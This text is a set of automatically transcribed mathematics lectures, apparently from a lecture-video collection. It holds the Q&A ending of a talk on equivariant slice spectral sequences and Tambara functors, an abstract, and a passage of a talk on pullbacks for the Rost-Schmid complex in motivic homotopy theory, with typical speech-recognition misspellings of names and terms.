around, and that's exactly the role of the transfer. You can do better, though. This is saying something just about d of n of the norm. It's just the usual Leibniz property. And so this is the very last thing I'll say. And you can do better. If dn of x, so now I'm in my slice spectral sequence, is y, then I actually get a longer differential. d2n minus 1 of that same classroom before, a sigma times the norm of x is the norm of y. For this, I don't know a classical antecedent. This is saying that instead, that once I put in this a sigma, it actually, the differential almost behaves like a ring map at the expense of shearing it from the dn to d2n minus 1. So it's like saying, if I know the differential on x, then I can, is y, then there's some kind of differential on x squared that looks like some kind of y squared. And these collections of properties I've described them are the way that people are doing computations with these spectral sequences. So I think I'll stop there. Okay, so first, Mike thanks a lot for the nice talk. And so we are, so let's fire the first question. So can you read it or do I read it? Yeah, so Sean asks, couldn't I view a sigma n and n is two different power operations? And then it would look like some of Brunner's work. Yeah, I think that's exactly the way that I want to do this. They, it's, I should be able to connect a sigma n to some kind of, of actually in this case, diolashov operation, because I'm looking at an operation on homology. But I don't, I don't quite know how to make those work. I'd love to talk to you more about that. Yes, they, Sean also asked, do these norms prolonged the category of filter decorant spectra? Yes, they do. Uri asks, is the universal property of the slice filtration written down anywhere? No. This I don't think maybe, but I don't, I don't recall. Oh wait, maybe in the handbook of homotopy, in the chapter I wrote for the handbook of homotopy, I believe I talked about the universal property of the slice filtration. There, so thank you for making me remember that. And then Anonymous attendee asks, could I mention some of the applications to chromatical metopoeia as promised in the abstract? Also, yes. So the applications of some of this. And I'll be quick. The applications are first, let me recall a theorem of Han Shi. And this says that the Lubin-Tate spectra, E n, for any n, are real orientable. In other words, I have a map of ring objects in the homotopy category, M U R to E n. Knowing this, if n is 2 to the k minus 1 times anything, so times M, then the Hopkins Miller theorem says that C 2 to the k acts on E n, which gives me then via just the, the norm forget a junction I described above, a map from C 2 to C 2 to the k of M U R into E n. That's again a map of ring objects, but now in the homotopy category of C 2 to the k spectrum. And then recent work of, of Bo Tui, Mi, Ding Shi, and Ming Kong Zheng, Ding, says that you can use this to build a model for E theory. E n as the k n localization of, of some quotient of M U R. And to spell out exactly what stuff is would take me a little far afield. But the important thing is the slice spectral sequence here has a describable, a more understandable example. E 2 and then etc terms. Then the corresponding Lubin-Tate theory had. We knew the C 2 action on E n, but being able to describe the C 2 to the n action on E n in a way that we could write down the homotopy fixed point spectral sequence, that was, that was sort of the, the bloody edge of the state of the art. Using these sorts of equivalent methods and stepping through the norms and these sort of quotients of the norms of M U, the slice E 2 term is very easy to write down and to describe. And then you can use the techniques that I was describing over the course of the talk to sort of bootstrap differentials, inducting up over the order of the group and use this to get a lot of information about the homotopy groups of the Hopkins Miller spectrum in ways that we never were able to before. Okay, so, so I have a question. What's the link between Tambara and Greenfunktors? There's a forgetful functor. Every Tambara functor has an underlying Greenfunctor. So a Tambara functor you can think of as a Greenfunctor together with these additional multiplicative norm maps. And then there's actually just as there was a hierarchy that started with coefficient systems and it ended in Mackie functors where I start to put in more and more transfers. There's a hierarchy between Greenfunctors, which are Tambara functors with no multiplicative transfers, all the way up to Tambara functors, which have all multiplicative transfers. And this hierarchy, I can, it's exactly analogous to the additive hierarchy for the Mackie functor case. And this is, this is an important feature. So thank you for bringing it up. Zyrsky localization does not work well in Tambara functors. So for equivariate commutative rings, Zyrsky localization doesn't preserve the property of being a commutative ring. It does always preserve the property though of being sort of the spectral version of a Greenfunctor. So an algebra over an E infinity operat. But it's, it's a very particular kind of E infinity operat, one in which the group doesn't act. And so that's a subtlety that shows up and makes some of the computations a little trickier. Okay. So and also I have a kind of maybe vague or broader question. So, so you describe Mackie functor and they are defined for finite groups, but is there a theory for other groups? So first example would be profite groups like Galois. Yeah. Yeah. Yes. And there are several, several versions of these for the, the cases that were most studied in classical homotopy theory were compact Lie groups where again, we have a good notion. And there, and you have Mackie functors for a compact Lie group, and they're describing the homotopy groups of a genuine G spectrum for G compact Lie. They're the multiplicative version of these only shows up for finite index. So pairs of finite index subgroups. There's no sort of degree shifting part that can show up in the, in the compact Lie. For profite, Dresden-Ziebenacher have a, a bit vector construction for, for, for sort of profite groups that's generalizing that ordinary bit vectors. And they're describing the profite version of the Burnside ring in that case, because the bit vectors, the bit vectors of Z is, is where the truncated bit vectors are exactly giving me the various Burnside rings as I look for like C and or whatever my truncation system was. Barwick also in his spectral Mackie functors has a really beautiful approach to understanding the profite case of a Mackie functors as well. Beyond this, you can, nothing, nothing that I was writing down really depended on, on the group being finite. I could still talk about finite G sets for G not finite. I start to run into pathologies like if G is divisible, there aren't any interesting finite G sets. And then I'm going to start to run into trouble. But aside from, from those cases, you can talk then about, you can talk about Mackie functors, you can do all the same thing. Last question I was also thinking about, I don't know if you know these Ros cycle modules. So it looks really like Mackie functors, but there are two operations that are added. So it's kind of multiplication by unit and residue maps for valuations. And it, it, it, it made, it could met, you, we could see that as Mackie functors for the so-called Motivique Galois groups, where you have transcendental extension. So have you seen something like that? And I guess, I haven't, but, but that's a, that's an interesting thing. I'll think about that. I think one of the reasons that I wanted to question. Yeah, yeah. One of the reasons I wanted to give this talk is I think a lot of the techniques that we've been using in the, recently in the ecu variant context should port through without change into the Motivique one, all the stuff that we've been seeing with the multiplicative transfers, anything showing up in the, in the Bachman-Hoywa normed Motivique spectra. We should have analogs of these two kinds of conditions on differentials in certain spectral sequences. And this last one, the one that changes degree, it's allowing you to lift differentials multiplicatively in a way that's, that can actually be pretty surprising to get new ones. So I'd love to see the analog of that, um, Motivique. Okay. So it seems we have no more questions. So again, Mike, thanks a lot for a nice talk.
|
Foundational work of Hu—Kriz and Dugger showed that for Real spectra, we can often compute as easily as non-equivariantly. The general equivariant slice filtration was developed to show how this philosophy extends from C2-equivariant homotopy to larger cyclic 2-groups, and this has some fantastic applications to chromatic homotopy. This talk will showcase how one can carry out computations, and some of the tools that make these computations easier. The natural source for Real spectra is the complex points of motivic spectra over ℝ, and there is a more initial, parallel story here. I will discuss some of how the equivariant shadow can show us structure in the motivic case as well.
|
10.5446/50930 (DOI)
|
Well, I mean, thank you very much for the invitation to speak here and for organizing a summer school in my living room. It's super convenient. Excellent, guys. Okay, so the title is maybe a little bit cryptic, but I, right, so maybe I will convince you hopefully that the result is not so much. Okay, so let's try to get there. So first of all, of course, well, that's why I prepared the first few things, which I want to say because they are all obvious because you've been listening for more than five minutes. So I will, what I want to talk about is some results in motivic homotopy theory. So I'm interested in this category of motivic spaces. What's a motivic space? Well, it's a special kind of pre-sheaf valued in spaces. And so a pre-sheaf on the category of smooth varieties and such a pre-sheaf, which happens to be a sheaf. So I will always be dealing with misnavage sheaves. This is a typology. Well, it's some sort of topology, which is somehow relevant. It's the correct one for various reasons. It doesn't matter hugely right now what it is. And then of course, there's going to be some extra condition because it would be silly to have like two names for the same thing. And the extra condition is this so-called A1 invariance, right? So you just, you look at all those sheaves F such that if you evaluate it on some smooth variety X, or if you evaluate it on X times A1, you get the same thing. And this is the so-called category of motivic spaces. So there are of course, supposed to be lots of motivic spaces because supposedly studying this category will tell us good things about the world by which I mean polynomial equations. So for example, if I take any smooth scheme whatsoever, then I can try to, well, it will not usually as a pre-sheaf, of course it will live here, but it may not be here. But you can just sort of brutally move it into this category because this inclusion has a right adjoint which is called the motivic localization. And that's, that's, that's the obvious thing to do. And usually I will not even write this L mode and I will not write this unada embedding thing. I will just say view X as a, well, this is not what I was going to say. What I want to say is I want to view X as a motivic space. And this just means that you should do this localization, which in general is of course highly non-trivial. But I want you to please imagine doing it. And then there's, there's another class of examples, which is going to be very important for my talk, which is let's say you take some sheaf of a B in groups, right? So in this category here, you take some of the simplest possible objects. Well, of those which are, I mean, you do write some not sheaves of spaces, you now make them zero truncated, but you give them some extra structure. This is a B in group structure. So that seems like a pretty reasonable thing. And then you could ask, is it the case that this, that this sheaf actually lives in the category of motivic spaces? And I mean, that's not always true. There's a condition and I mean, it's just this condition here, but maybe for a sheaf of a B in groups, this looks a little bit more familiar. It just says that if you take F, you evaluate it on X or you evaluate it on X times A1. And you should just get the same a B in group. Okay. So this maybe was not very exciting. So what else can you do with a B in groups? Well, you can look at their Eilberg-McLean spaces or in this case, I can look at the Eilberg-McLean sheaf KNF, right? So this is going to define some sheaf of spaces by definition. And then I can ask again, does it live in this category of motivic spaces? And well, you need this homotopy in various property. And what does it mean to evaluate some, some Eilberg-McLean sheaf on a smooth variety? You get some space. The homotopy groups of which are the homology groups. So in this case, the condition is that this homology, HI of X times A1 with coefficients in F should be the same thing as the homology X with coefficients in F. And this should hold for all I less than or equal to. And so you see, in principle, as you make this N bigger, you get somehow a more interesting object and you get, get a more stringent condition. And then it's somehow natural to single out those pre-sheafs or those sheaves of a BN group so I can do this for all N at the same time. And those are called strictly A1 invariant. Right. So let's, let's just leave it at that. Okay. So now we come somehow to, to something which is close to the heart of the whole thing, which of course, classically, you have this notion of connectivity of space. I already implicitly used it by saying that like an Albert McLean space is somehow particularly simple. And what, what, what is, what this has to do with is that you some sort of sphere and you build how you can attach spheres to your spaces, for example. And more typically we somehow we have two spheres again. I'm sure you know this, right? So that's the usual sphere, usual circle if you want. Sir. Sir. Sir. And then there's somehow some algebraic circle, which is denoted GM. And I mean, it's just you take the complement of zero in the affine line and let's say you point at one and then these spheres, they define your point of motifs spaces, which, well, they're, they're a bit like spheres somehow. For example, I mean, the complex points, of course, of GM is just C minus the origin, which has the homotopy type of S1. So it looks like it's just the same thing. That somehow this is a very topological observation and algebraically, they're different. And then what this tells you is that you somehow get two notions of connectivity out of this whole thing, right? You can measure connectivity somehow in terms of S1 or you can measure it in terms of GM. And I mean, there's no reason for this, for these to agree in general. Now I just said there's no reason for them to agree. So let me contradict myself. So here's an important example. If I take a smooth scheme and I take some closed up scheme, but it doesn't have to be smooth. And but I will assume that it has a co-dimension at least D everywhere. And if you do this, well, I mean, whether you do this or not, you can look at sort of the formal tubular neighborhood of C and X, right? So I do this thing X mod X minus Z. Right? So X is a smooth scheme. So it defines a motivic homotopy type and X minus C is a smooth scheme defines a homotopy type. So I can take the co-fiber of the inclusion, just define some motivic homotopy type. And yeah, I mean, if Z was smooth, then you should think of this as some sort of algebraic version of a tubular neighborhood. And if Z is not smooth, then I know it's this algebraic version of a tubular neighborhood, but maybe a bit harder to imagine. And it turns out that this guy, I mean, if I view this as a pointed space, this is D minus one connected. D minus, that's not very good. D. And well, it's a D minus one connected in the S1 direction or in the GM direction. It turns out in both directions. Okay. So how do you see this? Well, first is let's say that the Z is smooth. And then there's something called the homotopy purity theorem, which basically says that this really does behave like a tubular neighborhood. And it tells you that it looks basically like a tomespace of some, I mean, like the tomespace of some vector bundle. And so it means that locally somehow it looks like this sort of thing, a1 mod GM, which is P1 and which is somehow, which is S1 smash GM. So the point is locally it looks like it's connected, or I mean, if it's dimension D, then it's going to be S1 to the, I mean, it's SD smash GM to the D. And so locally it looks connected in both directions. And then somehow the way the topology works, this is the name which topology works in the TLCMU theory is that this also implies that it's globally connected in the sense. And so what if Z is not smooth, it turns out that there's some sort of filtration argument and you find that this result is still true. Okay. So this will somehow play a big role in what is to follow. And now we can look again at our favorite strictly homotopy invariant sheaves, right? So abstractly homotopy invariant. Right. So then my F defines a particularly simple type of motivic space. And then what happens is that this space is discrete in the S1 direction. Okay. So it looks like the simplest possible thing which you could deal with in this direction, but it doesn't have to be in the GM direction. So somehow there's some, some, some structure going on, which is masquerading, but yeah, so it's not immediately obvious, but it turns out that there's some more things going on. Okay. But not in general in the GM direction. And I mean, I'm not sure that have anything. That's a question for you, Tom. Yes. I saw the question, is there a nice reference for this filtration argument when Z is not smooth? Probably, but not off the top of my head. So I mean, also when I make this claim, I'm saying that it's going to happen in the category of S1 spectra. If you know, like these sorts of details, I'm not claiming this in the sort of completely unstable sense if I want to be very precise. So I'm sure I can find you one. If you email me, I can find something, but not right now. If I clearly remember something is at the end of Röndig's erstware advances mass paper, but at the end of the paper, this filtration argument. Okay. Thank you. Yes. Okay. So I was, I was trying to explain why it's not always the case that these guys, right? So if I take one of these guys, why is it not always somehow connected in the GM direction? And I mean, I think just because there's no reason for it to happen, right? There are these two directions and you picked something which by definition was sort of discreet in the, in the one direction. Why would it be in the other direction also? So you can just work out some examples and you see that this happens. So let me introduce some notation. So in general, let's see sort of a spectrum. For example, it would be discreet if and only if it's loops vanish, right? So it seems important to study the GM loops of this guy. So if this is always zero, then we would learn that these guys are always somehow discreet in the GM direction, but it's not. So let's give you the name. This is called F minus one. That's why we have this contraction, construction. And the point is that this need not be zero. And they, right? So now let me just give you an example. So what you can do is you can work out, this is not totally trivial. The F minus, the discontent, this loop space is again just a, a sheaf. And it's section over, let's say K is given by F of A1 minus zero mod F of K. And I mean, you can put X instead of K in as an obvious modification of this formula. And then you can just, that there are some strictly homotopy invariant sheaves, which we know, for example, the witch heave. So you take the pre-sheaf, which assigns to some, let's say, smooth variety. It's a wit group or wit ring. And then you take the associated sheave in the, in the, in the, in the same topology. And this turns out to be strictly homotopy invariant, not obvious. And what you can compute, what one can manage to compute is that if you do this contraction business, you just get the wit guy again. And this is not zero. So, and also another very famous example is these KN millenowitz. So the unremifined millenowitz K theory. Also, if you contract it down, they're never zero and they form like this, this internet GM loop sheave. Okay. So this is just something which happens and which may be surprising at the beginning. But okay. So we got to live with this. Now I want to put on my, my topologist's hat for a little bit and think about, think about loops based theory. And so one slogan, which I have picked up is that somehow taking loops increases structure, let me just roll this out here. Increases structure. So what do I mean by this? Well, I mean, if X is a topological space, let's say pointed, right? And then I take the usual loop space. Now this has more structure, right? Because loops can be composed. So in other words, this is some sort of monite. And if you want to be fancy, this is an E1 monite or a infinity. Okay. So this is somehow the beginning of classical finite loops based theory. So if you take higher loops, right? So if I put an N here, then I make this an EN monite. And somehow the point is that in fact, this is all the, this extra structure recovers everything. So that's somehow the crux of it. Finite loops based theory. The most basic result, I'm sure there are very difficult things which one can study. So now what I want to claim is that if I do the same thing with my strictly homotopy invariant, chief F, and I do this in the GM direction, I still get more structure. So let's take F strictly homotopy invariant. Right now, let me look at the first loop. So I will denote it F minus one for reasons of tradition. And now what's clear, well, what's almost clear is that this is going to be a module over somehow stable maps from GM to GM. And the point is this thing has been computed by Morrell to be the growth and de-quittering of K. Okay. So what you learn is that this F, I mean, it was just some arbitrary, yeah, the F, it was just some strictly homotopy invariant chief, which someone has given you. You contract it down once. And now suddenly everything becomes a module over the growth and de-quittering, which I mean, can be a moderately complicated ring. It's just some extra structure which somehow pumps out of the sky. And maybe it will be useful. And there's this, there's also more. So there's also something called, well, I would call it monogeneic transfers. And I don't want to go into too much detail exactly what this is. So what it does is, if you have some fields, let's say, finitely generate over K, and then you have some finite monogeneic extension. Right, so this is finite extension. And you've chosen a generator, then this yields a transfer map, sort of tau x from F evaluated K of x goes to F evaluated K. Right, so this is somehow some fancy way of adding things together in some special way. And we will see later some other incarnation of this. But all I'm saying is that, right, so also in our motivic setting, it turns out that if you do take GM loops, you do find more structure. And so what I was saying here is that, classically, if you recover enough structure, then somehow this loops, then you can reverse this loop operation, right? So I do this omega n thing, and it goes, let's say, from n minus 1 connected spaces. And then I go to en monoids. Monoids, as I said. This is somehow some way of encoding the fact that the first loop space has a multiplication. The second loop space, the multiplication becomes commutative. And then higher loop spaces becomes more and more commutative. This is actually in equivalence. So if you give me only the en monoid, which was the loops on your space, then I can actually reconstruct this space. And I mean, you just gave me everything. OK. And so what this tells you, for example, is that, whoops, why is this not OK? Right, so if you have some, if x is n connected, maybe it's n minus 1 connected, then, and y is arbitrary, then if you do maps from x into y, well, first of all, it is only depends on the n minus 1 connected cover of x. Yeah, of y, only on x and, well, sort of the n minus 1 connected cover of y. But then, of course, I can, I've already learned that n minus 1 connected cover only depends on the loops. So I can put an omega n here and I can forget about the covering, whatever. Doesn't change anything as an en monoid. OK, so this is maybe a bit of an esoteric observation. But if you do make this observation, you could. I mean, right, so now we have a motivic homotopy theory and how does this work? Well, usually something which works classically has an analog, hopefully, emotively. And then sometimes, if you're very lucky, you can prove this analogous thing. And then it gives some interesting result about algebraic varieties. That's somehow secretly the plan of our motivic homotopy theory is supposed to be useful. So now let's try to think about this analog while you might guess the following thing based on that. So I put some motivic space here, which is highly connected. What do I take? Well, I take my x mod x minus z, right, from the first example. Core dimension of z greater than or equal to z. And now I'm going to map it into something else. And let me put k and f here. Right. And so now remember, this guy here is d, so it should be a d. So this guy here is d connected in both directions. So if you believe that this analog somehow should told, it tells me that this set of map, I mean, this homotopy classes of maps thing, it should only depend on the default loop space of this guy in both directions with its extra structure remembered. OK, so it only depends on. Well, if I take the default loops in the S1 direction here, I just get back f. And I remember that it's the chief of a billion groups. And then if I take the default loops in the GM direction, I get f minus d. F minus d with its extra structure. Oops. What did I do? OK, so we have to somehow figure out what we think is all the possible extra structure. And what we think is all the structure, i.e. the transverse plus GW module structure. I mean, of course, we don't know this. Maybe there's more, which nobody has discovered. But unless you provide me with more structure, which could possibly depend on, I will just guess maybe that's all there is. And it turns out that that's true. So we do not have motivic finite loops based theory. Certainly we do not have this. But I mean, of course, this is an extremely special case. And you might imagine texting this by other means. And you can. So this follows from a theorem of Morale. So before I do this, let me observe that this set of homotopic classes here, this actually has a more classically algebraic interpretation. Because it's just the same thing as taking cohomology. So mapping into this guy here is taking cohomology. So this is some hd of something with coefficients in f. And now I'm mapping out of x mod x minus c, which means I take cohomology of x with support in c. OK, so now this topological statement here, or this statement coming from topological intuition, it says that this cohomology group somehow only depends on the contraction of it. And when you get there and you know some things about motivic combotopic theory, you will easily see that this is true. So Morale, well, I mean, you will see this is true because of some difficult results. So Morale says or proves that the so-called Rothschmidt complex, and now we get to the title. So it looks a bit like this. This is some, you take your f and you view this as a sheet on the, this name which side of x, and then you can resolve it. So you see 0x at c1 of x. And it keeps going. And this computes cohomology. OK, so this is not super happy yet. I will try to answer your question in a second, Sean, because I mean, I need to tell you something about what these cis are. But so the point is, so this computes cohomology. And so roughly what are these cis? Roughly what I want to say is that the cd of xf, this is going to be the sum over all the points of co-dimension d and x of the default contraction evaluated at x. So this is not literally true, but it is morally true. And this is, right? So, and then there's a differential. And it uses transfers and stuff. But the point is, you can check explicitly, right? So now what does it mean to take cohomology with support in z? It just means that I have to sum here not over things which are of co-dimension d, but also inside z, right? And the effect is just that you chop off the first d minus 1 term. So this one goes away, this one goes away, and so on and so forth. And so you find some complex. And the terms, well, it starts with f minus d of something, and then you take f minus d minus 1 of something, and so on and so forth. And so you can easily convince yourself that also this differential, which has some explicit form, it says, well, you do something, you put it back to here, and you transfer, and you multiply, and it's a big mess. But you never use anything which is not already encoded in f minus d. And well, that's how you see that this topological guess here, it turns out to be true. So now I have a chance question. Can we view the extra structure? So I don't think so. So it's important that you do this with support. So it comes from the fact that somehow you're supported in high co-dimension. Or the extra structure on f minus d. I still don't see how to get this out of the fact that hd with coefficients in f is a group. I mean, it comes from the fact, no, I mean, it comes from the fact that GM somehow has special maps of GM, give you a special structure on the loop space. So I don't see how this is really related with them, with co-mology. So I feel like this would more give you extra structure in the sort of S1 direction, but we're dealing with sheaves of a billion groups, so it has already all the extra structure in the S1 direction. Okay, so now we have this topological guess here, and I explained to you that maybe for some esoteric reason, you want to convince yourself that this is true, and then Morale has proved that this is true. But I mean, categorically minded people that we are, of course, we expect all of this stuff to be factorial. Right, so if I change x to some other variety, then obviously this is more, I mean, then there's going to be some pullback map, and clearly this also only has to depend on the contraction. So that seems obvious enough. So this is sort of this obvious question, but what about pullback? Right, so let me amplify this, what do I mean? Right, so we let, sometimes I don't know, let f from y to x be some morphism of smooth schemes, and let z contained in x closed, closed, sorry, co-dimension, greater than or equal to d, and then I have to assume, of course, that the pullback also has co-dimension greater than or equal to d, this is not automatic. And I let my f be one strictly homotopy invariant sheaf. Okay, so then there's this pullback map. Okay, I mean, that's because it's comodity with support, it's factorial by definition, whatever abstract definition you use when like injective resolution, so whatever. And so this group here only depends on the contraction, right, on f minus. Yeah, obviously this map only depends on f minus d with extra structure. Okay, so this only depends on f minus d plus transfers, let me just write so this is just some shortcut for all this extra structure which we discovered. And, right, so when I, when I, when I came to this, and this little exercise about the topological expectations and I noticed that Fabian has already proved that I was very happy, because, well, this would allow me to solve some interesting problem, and I assumed that surely just souping it up a little bit whatever we've done so far, and it should give you should give you this. And, so I will tell you in a little bit what I was hoping to do, but it turned out that I spent many hours days and nights trying to do this obvious thing. And I could not do it, or it took me very, very, very long time so this turns out somehow, either I'm a bit dumb or this is much harder, or equally hard as proving this is not at all follow obviously. So let me note this theorem. And this is what this is the theorem which the title of the talk is about right, so the pullbacks for the rush mid complex exactly is supposed to say, Well, how do you want to write what you would want to think is that there's some some map, which you do on this rush mid complex, and that should tell you how to do the pullback, and then you should easily deduce this result here. And it's true. At least this is let's say to then there's somehow a map which you can write down on this partial rush mid complex which you think should be the pullback and it would have the desired property. But it's very difficult somehow to prove that this map which you do write down, indeed is the map which is supposed to write down. And that's what the theorem is about. Okay, so I hope the statement makes sense. So let me interject for a little bit. So who the hell cares. I feel like that that would be a very reasonable question. I mean, the extent of course, we're just testing the waters of a motivic finite loop space theory I think by itself this is a reasonable thing but maybe also, it would be fair to say it's a little esoteric but so let me, let me give you one corollary which one kind of came from this. So this is in joint work with Maria Yackelson. And it says the following so. So let's say that this is a perfect fute k. I should have said this from the beginning so case always perfect file and attribute results. Okay, so let me fix some motive space. I'm pointing motive space. Now what can I do what I can do is I can try to stabilize this guy right so spaces are hard. It's simpler and how do you make it simpler basically by somehow is by smashing with p1 right by smashing with both the directions of connectivity with s one smash yeah. So what I can do is I take my x. And then I map it to omega p1 sigma p1 x. In some sense, classically what happens is that this sort of Freudian tiles suspension theorem which tells you that somehow this map here, depending on maybe the connectivity of x it will induce nice morphism and some homotopy groups. And this is this sort of stabilization phenomenon and once you observe this and in fact what you do is you do this a bunch of times. Let's say this n plus one times here. And basically you want to take the core limit of the whole system right and then this is going to be the right to this core limit here this is going to be the stabilization and this this space at the end somehow. This is supposed to be the simpler version. And so the point of the Freudian tiles suspension theorem is that if you just do this right you're starting with x and then you're doing a bit more and a bit more. And these homotopy groups they will stabilize. So there is this nicer stable answer at the end in the infinite infinitely far, but actually you already reach it at the finite stage. So that's, that's I would say a very important result in classical topology, which unfortunately we do not have an equivalent of motivically. And so, so this is a terrific result here, it can be used to prove that this map here well for entire says that you should get an isomorphism on the first couple of homotopy groups depending on how high up you go. And so we can do this now on pi zero, which of course is much much weaker than the what you would hope for, but it says that this is an isomorphism. If n is greater than equal to three. Right, so you can imagine you have your space you have x and then you have loops sigma x and your loops squared sigma squared x and on to fourth. And then you reach the stabilization here, sigma infinity x somehow. And pi zero of Sigma infinity x is going to be the same thing as pi zero of Sigma three, Omega, no Omega three Sigma three X. This stabilization this for entire thing, which is supposed of course to happen for all homotopy sheeps somehow, at least on pi zero it does happen and it happens at three step. So I would I would like to believe that this is a, this is quite a nice result. And then hopefully it would justify expanding energy trying to prove this. So now, the rest of my time I would like to spend trying to indicate to you how to prove this theorem. I mean how to prove this theorem. So I will not indicate how you get right I won't do this, because well that would be another half hour, but so I will try to do this. And then at least for my taste. This is basically some sort of pretty, pretty hardcore algebraic geometry. But, okay, so let's let's try. So how do we prove the theorem. Well, I mean it's, it's, it's going to be, it's going to be a struggle. We have to fight. Now there, first of all, there's some easy cases. So there's an easy case, which is when F is smooth or more generally is flat, but somehow it doesn't. And somehow does not help. This is, I don't believe this is known to fail. I mean, maybe it's, it's known not to like work in the most optimal bounds which you could guess but I don't know I don't think anyone knows these things to fail. But we don't we we can prove it. So I was a question if this was if this stabilization result which I proved for pi zero. Will it also hold is it known to be false for higher home to be sheeps and I believe it's not known to be false I'm sure everyone believes it to be true, but we don't know how. The easy cases is if F is smooth and the reason is that in this case, there's a pullback map on the entire rostrum complex without support. It's not compatible with the pullback in F because I mean basically you build it to do that. And then the universal properties sort of what the resolution means immediately tells you that everything works so smooth maps super easy. There's another easy case, which I don't want to treat, which is if your F is what's called the homotopy module or an infinite loop sheet. And the reason is that in this case, I told you there's this fantasy formula which you want to write down, but it uses transfers, and then you have a problem because you don't have transfers on C zero so you cannot make this map. But if you have an infinite loop sheet and you have transfers on C zero. And again, you can then use this construction of Ross to write down the pullback map and you can check that this does everything that you want. And basically the problem in general is that you cannot somehow write down this map on the Russian with complex because there's some somehow degree zero you don't know what to do. But you can write it down in the higher degrees but then you have to somehow argue that it's the correct. So here's a key observation. And I'm just the fact about homotopy modules because somehow the whole point of this result is to prove it for us really homotopy and range of. And they're definitely not all homotopy modules. So the key one key observation is as follows. Very simple. So let's say I have my Z contained in X, what I mentioned greater than equal to D. And then what I do is I look at the generic points of Z. And I only look at those let's say of co dimension D on X. I mean every point of Z has co dimension at least D on X. So I'm looking at those which have like the smallest possible co dimension, not every generic point needs to do this because I mean, it could be stupid things like Z is a union of two things and one is much smaller so it has higher co dimension. Okay, so let's typically exit some smooth guy sees some close integral guy and then there's just one generic point and whatever. And then what you do is you look at, you look at this map HD with Z X F. And then I map it to this HD. And what I do is I hand it to lies my X in this in this generic point so that's it need not be a close point of exit also this is maybe some sort of slightly if the algebraic thing to do but okay so that's the beauty of algebraic geometry we can do some slightly things. And okay so here the support Z should maybe Z intersected with a HCI but I mean it's going to be annoying to write. The point is two fault one is that this map is an injection. Right and the reason is just that you look at the most mid complex. Here. Right so what if I do come on to the support in Z. It means I chop off the first couple of terms, namely first D minus one terms. So it's going to inject into this thing here. So I see why I see exactly those points of co dimension D which lie in Z, and I do the default contraction. And so, since the hands realization does not change the rest of your field. This map is in an injection. And the other point is that that this map from the hands realization to access basically pro et al. So, up to some pretension pretending it's it's it's all. That's basically one of the smooth maps which we understand. So pullbacks understood. Okay, so what this means is that in general whenever I have to somehow pull, I write I have to pull back along some arbitrary map, I can at least sort of shrink this target in some et al neighborhood of certain points. And this hopefully will allow me to make it a simpler. So that's what I want to say, or how I want to summarize is that the some of this problem is local in some specific sense. Okay. So now, now we come to the real thing. So I will want to explain. Yeah, so I want to sketch the proof the following lemma. And I will just show you the assesses follow so I assume that the field is characteristic zero. And I let y and x essentially smooth. So this is just some trickery which allows me to look at something like the hands realization it's not quite a smooth scheme but it's reasonably close to one. So I give myself some map from y to x which is in fact a closed immersion of co dimension one. And then of course I have to give myself a z content in x co dimension greater than equal to D. And I have to assume that if I intersected with y content in why still has co dimension greater than equal to D. So I give myself some F script the homotopy invariant. And then I have to prove and this is what I want to prove then this pullback map. I have a star HD was part in Z X F. And see in the sec why I suppose why F, and I will call this thing here W. This only depends on F minus D. Last transfer. So this is this is the special case of the main theorem. It's a special case a because I'm assuming that the characteristic is zero and be because I'm assuming that this map F is them is the regular immersion of co dimension close the version of co dimension one. So this, this is not a huge deal, because we've already dealt with smooth map so I can, I can reduce to write every map composers can be written as a composite of the smooth map and the regular immersion. So you have to deal with regular emotions, and the problem is also local. So I can factor it locally as a composite of the co dimension one immersions. So you reduce to this co dimension one case easy. So the characteristic zero assumption is somehow serious so I'm going to say some things and that they don't quite work in positive characteristic you have to argue more carefully but something along the same lines also works except you have to deal with annoying things like well regular not being the same as smooth and blah blah blah. This is, yeah, so I have only a finite amount of time and energy to explain things to you and I think focusing in character to zero somehow. It's already complicated enough to argument. Okay, so we're 15 minutes I hope that we can, that I will be able to convey some ideas to you. So what do we do. So the first step, we reduce to the case where access dimension D plus one, then of course why has dimension D and Z has dimension one. And of course then W has dimension zero and I want to assume that it's just one point. And it's a rational point. Okay, so how do you how do you do this. Somehow this is this is some sort of standard trickery. So what you do is, you replace X by the hands realization right so I mean what I do is, of course I pick. Right so I pick my W and W. Point of co dimension D and why, right because the problem was local somehow in why, right because of this business here. The problem is local on points of co dimension D in why and W. So I picked this point and I just have to look somehow locally around this point, and I replace X by the hands realization in this point. And of course I also replace why by the hands realization in this point and see by the hands realization in this point. Okay, and then it's a, it's a sort of standard fact that this this inclusion here, then it admits in retraction. Okay, so this is not immediately obvious but I mean, algebraic ways of seeing this a geometric ways of seeing this. Please believe me that this is the case. And now of course because in character six zero disguise regular and disguise any field whatsoever so this map here is going to be smooth. Well, essentially smooth. Okay. So now what have I done. Well, I have localized in this point so you will see that these dimensions things happen automatically. And I've, right and I replace. By of course the residue field of w. And so by this by this trickery, I have assumed that I can now assume that this w is indeed a rational point. It's just I mean, the statement is so general and it's, it's, it's going to be hard enough so we be, we make our lives a bit more reasonable. Okay, so now I still want some further reductions. So I can assume that actually acts and wires move. Right so in the assumptions and also because I did the centralization business here. I only said it's essentially smooth so it's some co-founded limit of smooth schemes. And so I mean, all of these things that are going to happen sort of at the finite stage in this co-founded limit. And so you can always, and then there's some continuity thing that the value on F also will be done the co limit. And so you can always things happen at some finite stage so you can, you can assume that X and Y actually prop us I mean, not not proper but like real bonafide as smooth schemes. And then I can assume this Z in principle could intersect. Why in many points but I can as well I mean I can just throw out all the others so I can assume that C intersect Y is just W. I guess it's already included here. And I can assume that these move away from right. Because I mean Z is a curve in character six zero it's only have gonna have finitely many singularities and I just throw out all of them except for W also then Z will be smooth. No problem. So now this Y into X is a regular margin of co dimension one so it's locally principles again by working locally around this point W. I can assume that why is the vanishing locus of a single function. And finally I can assume that X is fine. Again, all of this because it's somehow it's a local problem. Okay, so I will admit that maybe it's not quite clear where we're going. But let me let me try so I'm going to now make two claims which basically are the heart of the proof and which I'm not going to prove because, well, time attention span various reasons. So the first claim is the following. So that there exists a function you bar from Z to a one having a bunch of good properties. And so first of all I wanted to not be zero at W. And secondly, I want this product you bar F right there's also a function from Z to a one. And this is going to be finite. Okay, and also I want you bar not to have double roots. Okay, so now how do you do this it's basically a Riemann Rock argument. Plus using the fact right so you can use Riemann Rock somehow because it's mostly a smooth curve. And this allows you to basically get all of this and then how do you make sure it doesn't have double roots it uses the fact that it fields of characteristics zero are infinite right because I could always add some constant on it and then no double roots. Okay, so let's believe this for now. And then what I do is I put five one equal to this product you go. Well, so I do sorry. Right, so I use the fact that this this axis affine. So I pick some you from X to a one extending you bar. And then I put by one equals this 